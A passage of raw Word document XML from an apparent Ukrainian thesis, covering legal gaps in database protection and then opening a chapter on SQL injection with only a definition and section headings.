    <w:p w14:paraId="26D87631" w14:textId="77777777" w:rsidR="0096070A" w:rsidRPr="0096070A" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="n77"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>здійснюють виявлення і реагування на кіберінциденти та кібератаки, усунення їх наслідків;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593B0FDD" w14:textId="77777777" w:rsidR="0096070A" w:rsidRPr="0096070A" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="n78"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>здійснюють інформаційний обмін щодо реалізованих та потенційних кіберзагроз;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DC77DD" w14:textId="77777777" w:rsidR="0096070A" w:rsidRPr="0096070A" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="n79"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>розробляють і реалізують запобіжні, організаційні, освітні та інші заходи у сфері кібербезпеки, кібероборони та кіберзахисту;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF2650" w14:textId="77777777" w:rsidR="0096070A" w:rsidRPr="0096070A" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="n80"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>забезпечують проведення аудиту інформаційної безпеки, у тому числі на підпорядкованих об’єктах та об’єктах, що належать до сфери їх управління;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D9A69" w14:textId="4072BF4B" w:rsidR="0096070A" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="n81"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>здійснюють заходи із забезпечення розвитку і безпеки кіберпростору</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1</w:t>
      </w:r>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C27F06" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00962467" w:rsidRDefault="00BA24D7" w:rsidP="009624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lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308FCC9E" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00846B4C" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc516752123"/>
      <w:bookmarkStart w:id="37" w:name="_Toc30433107"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Висновки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>о розділу</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="17A98F29" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="006A6BA8" w:rsidRDefault="00BA24D7" w:rsidP="00BA24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Cs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE5CF7D" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Недоліки в сучасному законодавстві викликають помітні труднощі у вирішення можливих конфліктних ситуацій. Проблема полягає у тому, що для такого терміну як «база даних», який увійшов у наше життя досить давно, немає єдиної думки серед представників різних міжнародних організацій щодо його визначення. Питання охорони таких нових об’єктів інтелектуальної власності, як «інтелектуальна база даних», «база знань», «інтелектуальна система», «інформаційна технологія», «інтелектуальна інформаційна технологія», які визначені сучасними стандартами, зокрема прийнятим в Україні Державним стандартом «Інтелектуальні інформаційні технології» (ДСТУ 2481-94), в законодавчій баз</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>і ще ґрунтовно не розглядались</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [16].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3155E612" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">21.04.2015року за № 2696 у Верховній Раді України було зареєстровано Проект Закону « Про внесення змін до деяких законодавчих актів України щодо правового забезпечення відкритості баз даних та прозорості реєстраційних процедур». Його розглядали у 4 читаннях, останнє з яких відбулось </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47681D73" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12. 07.2016</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>року. Даний проект був відхилений [17].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003EA79D" w14:textId="53A98A0E" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Для створення спеціального механізму правової охорони бази даних необхідно проведення кваліфікаційно-формальної експертизи. З введенням такого механізму захисту, окремим проблемним питанням стає процедура реєстрації прав на вказані об’єкти. Після проведення експертизи буде виноситись рішення про видачу державного документа (патент або свідоцтво), або про відмову в</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> реєстрації заявленого об’єкта</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [16]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB0D58C" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Проблема охорони авторських прав на бази даних урегульована на недостатньому рівні, що ускладнює організацію захисту баз даних у межах закону. Основними проблемами, які потребують додаткового дослідження та вирішення, є: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FD5FCF" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">встановлення уніфікованої термінології, що стосується інформаційної сфери; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73516B7A" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">забезпечення охорони комп’ютерних програм та баз даних, а саме визначення: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15951B03" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>основних засад правової охорони використання комп’ютерних програм та баз даних;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A06F4" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">переліку випадків, що кваліфікуються як неправомірне використання комп’ютерних програм та баз даних; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11296F59" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>санкцій за неправомірне використання комп’ютерних програм та баз даних [16].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2992CF6A" w14:textId="7652EEC6" w:rsidR="002E3E8B" w:rsidRDefault="002E3E8B" w:rsidP="002E3E8B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2317"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="669F0C40" w14:textId="0F34651A" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681742A7" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C16B3C7" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00846B4C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc516752124"/>
      <w:bookmarkStart w:id="39" w:name="_Toc30433108"/>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>РОЗДІЛ 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="4DFBA98A" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00846B4C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc516752125"/>
      <w:bookmarkStart w:id="41" w:name="_Toc30433109"/>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQL-ІН’ЄКЦІЇ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="4AA40194" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10DD5A91" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E83150" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Кількість сайтів і сторінок в Мережі неухильно зростає. За розробку беруться всі, хто тільки може. І початківці веб-програмісти дуже часто використовують небезпечний і старий код. А це створює безліч лазівок для зловмисників і хакерів. Чим вони і користуються. Одна з найбільш класичних вразливостей — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. В даному розділі буде розглянуто різні типи SQL-ін’єкцій, як вони проводяться і які існують контрзаходи проти них.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B88C39" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> - це метод, який використовує вразливість у веб-додатку, що не перевіряє вхідні дані, щоб передати SQL-команди через веб-додаток для виконання на сервері баз даних;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E84F76" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00080601" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693D12CB" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00846B4C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc516752126"/>
      <w:bookmarkStart w:id="43" w:name="_Toc30433110"/>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Атаки, які реалізуються за допомогою SQL-ін’єкцій</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="6706E709" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00080601" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
